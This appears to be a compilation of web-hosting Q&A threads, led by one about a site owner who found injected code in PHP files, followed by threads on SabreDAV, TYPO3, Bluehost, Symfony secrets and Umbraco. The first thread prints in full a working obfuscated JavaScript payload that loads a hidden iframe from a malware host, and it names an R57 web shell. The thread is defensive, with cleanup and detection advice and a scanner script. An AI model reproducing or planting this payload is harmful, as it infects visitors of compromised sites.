Found This Hack in my web server php files - virus

How did I get them and what can I do to avoid this in the future?
#8f4d8e#
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056
,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
#/8f4d8e#

It seems to be redirecting to or injecting content from absolutegift dot com, a malware distributor. Somebody uploaded it to your server. This person (or bot) may have managed to get your password or he may have used an exploit. Change your passwords, make sure all user input (including uploads) is validated. Make sure you have a firewall running (I recommend csf) and scan your server for rootkits.

Contact your hosting provider and notify them of the issue. This is very important; I've shut down plenty of legit websites because they were compromised and the owner lost all their data.
If you are using a CMS such as Drupal, WordPress, etc., make sure you upgrade and change admin passwords. If you have any plugins, make sure they are upgraded.
If you have no CMS, change your FTP & control panel passwords.
As for fixing the problem: if you are using a CMS, an in-place upgrade should replace all the files. If not, you can download all your files and use a word-processor like Notepad++ to do a find-and-replace throughout the directory. Also, your hosting provider might be able to restore from backup, or at least have some experience in fixing it.
To prevent it, don't use a CMS and learn some web security. Possibly hire a pentester.

This happened to me as well on an old site running Drupal 5. What I did was download the site and compare it with a clean copy of the codebase using meld (a graphical diff tool for Linux).
I found that there was a file called god.php that had been placed in one of the subdirectories and contained a PHP script which called R57. It's really scary what this thing can do.
Many of my files were infected with something like:
<?php
#8f4d8e#
...
#/8f4d8e#
?>
I cleaned this up manually a few times but kept being hacked until I removed the "god.php" file. I assume it might be called differently on your system.
If you have SSH access to the server go to your document root and search for all files containing the string:
grep -R "#8f4d8e#" .
You could also look for your version of the god.php file... look for traces of R57, for example by issuing:
grep -R "R57" .
Mine had a big ASCII art drawing of a bug at the beginning of the file.
I'm not sure how I got it, but there was a list of bad things: un-updated very old version of Drupal, PHP4 with register_globals on, shared hosting (and probably a lousy company).
What I did was move the cleaned-up site to another hosting company with PHP 5 and change all passwords: Drupal, FTP, MySQL, etc.
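As an added example that is not part of any of the answers above, here is the grep and find-and-replace advice from the two previous answers as one PHP script: it lists every file carrying the #8f4d8e# markers, decodes the octal array the injected script builds its code from (for the block in the question that turns out to be a 1px iframe pointing at the domain the first answer names), and with --clean removes the blocks. File and function names are my own; back up the tree before cleaning.

```php
<?php
// Added example (not from the original posts): walk a document root, report
// every #8f4d8e# ... #/8f4d8e# block, decode the octal array the injected
// script is built from, and strip the blocks when --clean is given.
// Usage: php scan_injection.php /path/to/docroot [--clean]   (back up first)
// One injected block, markers included; 's' lets .*? span the line breaks.
const BLOCK_RE = '/#8f4d8e#.*?#\/8f4d8e#/s';

/** Return every injected block found in $text. */
function findInjections(string $text): array
{
    preg_match_all(BLOCK_RE, $text, $m);
    return $m[0];
}

/** Rebuild the string the script assembles from new Array(050,0146,...). */
function decodeOctalArray(string $block): string
{
    if (!preg_match('/new Array\(([0-7,\s]+)\)/', $block, $m)) {
        return '';
    }
    $out = '';
    foreach (explode(',', $m[1]) as $code) {
        if (trim($code) !== '') {
            $out .= chr(octdec(trim($code)));
        }
    }
    return $out;
}

/** Remove the blocks, plus any PHP open/close tag pair left empty by that. */
function stripInjections(string $text): string
{
    $cleaned = preg_replace(BLOCK_RE, '', $text);
    return preg_replace('/<\?php\s*\?>/', '', $cleaned);
}

$root  = $argv[1] ?? '.';
$clean = in_array('--clean', $argv, true);
$files = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
);
foreach ($files as $file) {
    if (!$file->isFile()) continue;
    $text   = file_get_contents($file->getPathname());
    $blocks = findInjections($text);
    if ($blocks === []) continue;
    echo $file->getPathname(), PHP_EOL;
    foreach ($blocks as $block) {
        echo '  builds: ', decodeOctalArray($block), PHP_EOL;
    }
    if ($clean) {
        file_put_contents($file->getPathname(), stripInjections($text));
    }
}
```

Only files that actually contain the markers are rewritten; everything else is read and left untouched, so run it once without --clean first to review the list and the decoded payloads.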

Related

How do I make a simple public read-only WebDAV server with SabreDAV?

I recently began looking into WebDAV, as I found it to be an option for letting me play a Blu-ray folder remotely - i.e. without requiring the viewer to download the whole 24 GB ISO first.
Add a WebDAV source in Kodi v18 to a Blu-ray folder - and it actually plays! Very awesome.
The server can also be mounted on Windows with
net use m: http://example.com/webdavfolder/
or in Linux with
sudo mount -t davfs http://example.com/webdavfolder/ /mnt/mywebdav
and should then (in theory) play with any software media player that supports Blu-ray Disc Java (BD-J), such as PowerDVD and VLC.
vlc bluray:///mnt/mywebdav --bluray-menu
PowerDVD.exe AUTOPLAY BD m:
(Unless of course time-out values have been set too low, which seems to be the case for VLC at the moment.)
Anyway, all this is great, except I can't figure out how to make my WebDAV server read-only. Currently anyone can delete files as they wish, and that's of course not optimal.
So far I've only experimented with SabreDAV, because afaik that's the only option I have if I want to keep using my existing webhost. Trying with very minimal setups, because I've read that minimal setups should default to a read-only solution. It just doesn't seem to happen.
I initially used the setup from http://sabre.io/dav/gettingstarted/ and tried removing some lines. Also tried calling chmod 0444 MainFolder -R on the webserver. And I can see that everything does get a read-only attribute. But it changes nothing. It's still possible to delete whatever I want. :-(
What am I missing?
Maybe I'm using the wrong technology for what I want to do? Is there some other/better way of offering a Blu-ray folder for remote viewing? (One that includes the whole experience - i.e. full Java menus etc).
I should probably mention that all of this is of course perfectly legal. It is my own Blu-ray project - not copyright material.
Also: Difficult to decide if this belongs on StackOverflow or SuperUser. I ended up posting it on StackOverflow because SabreDAV is about coding, and because there's no sabredav tag on SuperUser.
You have two options:
Create your own file/directory classes for sabre/dav that simply throw an error when trying to delete. You can basically start with a copy of Sabre\DAV\FS\Directory and Sabre\DAV\FS\File and change the methods that do writing.
Since you're considering just using Linux file permissions, really the key thing you are missing is that 'deleting' is not controlled on the file or directory you're trying to delete. To delete a file or directory in Unix, all you need is write permission on the parent directory. However, I wouldn't recommend going this route, as doing this will just cause a weird error in sabre/dav, which might leave clients in a confused state. It would result in a 500 error, not the expected 403 error.
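The first option above (subclasses that refuse writes) as an added example; this is not the answer's code nor anything shipped with sabre/dav, and it assumes a Composer install of sabre/dav, a folder named public as the share root, and hypothetical class names of my own choosing.

```php
<?php
// Added example, not code from the answer or from sabre/dav: a read-only tree
// built from subclasses of Sabre\DAV\FS\Directory and Sabre\DAV\FS\File. Every
// write method throws Forbidden, so clients get a clean 403 rather than the 500
// a failed filesystem write would produce. Assumes a Composer install of
// sabre/dav and a folder named 'public' as the share root.
require 'vendor/autoload.php';

use Sabre\DAV;
use Sabre\DAV\Exception\Forbidden;

class ReadOnlyFile extends DAV\FS\File
{
    public function put($data)     { throw new Forbidden('This share is read-only'); }
    public function delete()       { throw new Forbidden('This share is read-only'); }
    public function setName($name) { throw new Forbidden('This share is read-only'); } // MOVE/rename
}

class ReadOnlyDirectory extends DAV\FS\Directory
{
    public function createFile($name, $data = null) { throw new Forbidden('This share is read-only'); }
    public function createDirectory($name)          { throw new Forbidden('This share is read-only'); }
    public function delete()                        { throw new Forbidden('This share is read-only'); }
    public function setName($name)                  { throw new Forbidden('This share is read-only'); }

    // The stock getChild() returns plain FS\File objects, which would still accept
    // PUT and DELETE, so hand out the read-only classes instead.
    public function getChild($name)
    {
        $path = $this->path . '/' . $name;
        if (!file_exists($path)) {
            throw new DAV\Exception\NotFound('File with name ' . $name . ' could not be located');
        }
        return is_dir($path) ? new self($path) : new ReadOnlyFile($path);
    }
}

$server = new DAV\Server(new ReadOnlyDirectory('public'));
$server->setBaseUri('/');
// Directory listings for browsers; no Locks plugin is registered since nothing
// can be written anyway.
$server->addPlugin(new DAV\Browser\Plugin());
$server->exec();
```

Serve this as server.php exactly like the getting-started setup; a DELETE, PUT, MKCOL or MOVE against any path then comes back as 403 Forbidden while GET and PROPFIND keep working.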

typo3 website move to other domain - need help step by step

I just got a typo3 website and need to transfer it to another domain.
Is it enough to copy all the folders (except typo3temp?) to the new place?
First I just changed baseurl in ts but it didn't do anything..
Should I do anything with the database when it is still on the same server?
In case your question is about "cloning" a complete TYPO3 system, an rsync/copy of the whole folder (yes, including typo3temp) is the best idea, as this works on all versions; everything else (like excluding typo3temp) depends a whole lot on your TYPO3 expertise to resolve. The database needs to be copied as well. If you need to change the db name or db credentials on the new system, you need to change them in
typo3conf/LocalConfiguration.php
As soon as you have done this, the Install Tool and Backend should work. At first, try the Install Tool:
https://my.new.domain/typo3/install/
If that doesn't work, your problem is with the webserver configuration or DNS.
If that works (and the reports there show no errors), try the Backend:
https://my.new.domain/typo3/
In case your question is about which changes are necessary to your TYPO3 installation if the domain changes and the web server itself is configured correctly, then there are probably two things you need to change in order to make the frontend work (although both cases might be omitted, depending on your configuration):
sys_template records, if any of those use absRefPrefix or baseurl. If you have access to the MySQL database, a
SELECT pid FROM sys_template WHERE config LIKE "%baseurl%" OR config LIKE "%absRefPrefix%";
might help find the template; however, this template configuration might also be stored in files (typically in fileadmin/templates/**).
sys_domain records; a MySQL
SELECT pid FROM sys_domain;
might uncover where those are stored.
However these changes are only necessary to enable the frontend to work.
Add a domain record in the backend. And while you don't need the content of the typo3temp folder, make sure the folder actually exists.
When you go to the new domain name in your browser, what happens?
Do you get redirected to the old domain? If so, maybe there is an .htaccess redirect happening.
Do you get to the new domain, but if you click on a link end up on the old one?
Do you get an error? If so, what is the error?
Does something else happen?

Where do I put the files I want to be displayed on my webpage on my webhost?

So I just finished the railstutorial.org twitter clone example and I want to put it online with my web hosting provider bluehost. Right now all I have is a file called sample_app with all of the rails stuff in it. And it works fine when I visit it on localhost:3000.
So I go to my bluehost file manager and there are 9 different folders, like public_html, public_ftp, rails_apps, www, tmp, access_logs, etc. I've uploaded sample_app into this overall directory and into the public_html directory itself. But when I visit my website it just displays the html in a default.html file in the public_html directory.
What exactly is telling my hosting service to use public_html/default.html of any of the hundreds of different files and folders that are in other places on my server space? How do I find this thing and tell it to instead use sample_app or public_html/sample_app and then process everything in that to display my rails application?
I've tried using bluehost support and they emailed me and said this would be accomplished by creating a symlink which links ~/rails_apps/NinetyNine/public to ~/public_html. I have no idea how to do this and the guides I find online all tell me to enter a series of commands. I don't know whether to do this in a terminal on my ubuntu system or some command prompt that bluehost provides. If it is at a terminal on my system, which directory should I be in? Any attempts I have made on my system have resulted in a no such file or directory error. When I asked bluehost to explain this they said that this was outside of the scope of their support and had to do with web development not hosting. It struck me as odd that they were unwilling to explain their own response to my problem, but whatever.
If anyone of you could help me or point me in the right direction I would very much appreciate it. Thank you
What is telling my hosting service to use public_html/default.html ?
That would be a setting in the web server configuration, probably Apache.
In Apache's case, the public_html directory is usually enabled with the
UserDir directive.
The default.html, is also an Apache configuration, DirectoryIndex.
Answering these because you asked: but typically, the global Apache configuration
is maintained by your provider (though you usually have some means to customize
parts of it).
Create the symlink from public_html to
They likely gave you a command like (maybe not exactly)
$ ln -s ~/rails_apps/NinetyNine/public public_html
That is something that is intended to be run on your webhost, from a command prompt,
at the top of your home directory.
Look for docs on bluehost for finding out how to get SSH shell access.
That's where you'll enter the command.
More generally, however, you want to make sure you read the docs on how your
provider wants you to upload applications. Bluehost seems to have very nice
docs here:
https://my.bluehost.com/cgi/help/rails
Why your hosting provider said it was out of scope.
You're a beginner, and that's officially OK. Welcome!
But if you asked them a question like "Do I enter these commands on my computer
or yours", they are definitely going to politely respond that this out of scope;
meaning -- "We can't hand-hold you through this". If you ran a gas station and
someone asked you how to use the pump, you'd tell them. But if they then asked
"OK but do I put the gas in my car or yours?" you'd be reluctant to answer, because
there's something fundamental missing.
So how do I get more pointers, directions on this stuff?
Lots of approaches. By far the best is to do as much stuff as you can on
your own computer. In your case, you could easily set up your own Apache
(Macs and Linux frequently ship with it - readily installable on Windows), and
that would clear up a lot of the conceptual issues.
Good luck!

Hiding production passwords from unauthorized users in Symfony

Symfony worked great for us when we were a small team of trusted developers. Now however, we are getting more people to help out, which leads to a problem with managing production passwords checked into source control.
I have production passwords for our DB, API keys, etc. stored in the Symfony config files which I do not want all developers to have access to. How can I hide these passwords from unauthorized developers and yet still grant them access to the source code?
If you're already using a version control: your first stop should be removing all passwords from the history in your versioning system. Good luck ;-)
Next: isolate the files which have passwords in them. (Probably config/databases.yml and apps/<yourapp>/app.yml.).
Copy/rename these files to *.yml.dist (for example: config/databases.yml.dist). Clean up all production passwords from these files, and leave only
the bare minimum to keep it going.
Make sure the original files don't appear in your VCS ever again. (svn ignore, or the likes).
Now when you set up a new environment, you can just copy the *.dist files to their 'real' names.
(What I did for my project is move all API keys to a single apikeys.yml in the config directory. That way all the properties in the app.yml keep being versioned, and my API keys don't appear in the VCS.)
Hope you get the answer to your question. Recently I have implemented this kind of work in my project. I think that storing this kind of confidential data in the database is the safe option, and getting this data using a filter is the best option; there is no need to store your data in app.yml.

Umbraco losing admin nodes

After a publish up to a remote server the Umbraco admin section on the remote server is not showing any nodes. The pages and images and everything serve correctly, but in the Umbraco admin section there is nothing below the top level nodes in each section and I can't right click and choose 'republish entire site'.
I've connected my localhost version to the same database and there I can see the node structures (but republishing made no difference) and I could see the node structures on the remote server before the latest push which did not include any .config changes.
Does anyone have a script that will re-create the node structure?
EDIT
I've seen a number of links on the Umbraco site like Unable to publish content into umbraco.config but none of it helped - including some permissions advice like #Niks.
I do have a workaround which is to stop and restart the server - which re-populated the nodes without any side-effects - but obviously this is inappropriate in a live environment.
I've seen this before manifesting as a caching problem. Firstly you should make Umbraco refresh its node cache. To do this hit the URL -
http://example.com/umbraco/dialogs/republish.aspx?xml=true
replacing example.com with your own host. Next, recycle the App Pool on the Umbraco server. Finally, clear your browser's local cache and restart it.
You may also be able to avoid this happening in the first place by completely stopping the Umbraco site you are deploying in IIS, copying up your files and then restarting.
Sounds like you may have permission issues. If you're on IIS6/7 make sure to add NETWORK SERVICE read/write/modify on the necessary folders:
/App_Data
/config
/css
/scripts
/masterpages
/data
/umbraco
/umbraco_client
If on a lower version of IIS make sure to add ASP.NET with the same permissions. Hope this helps.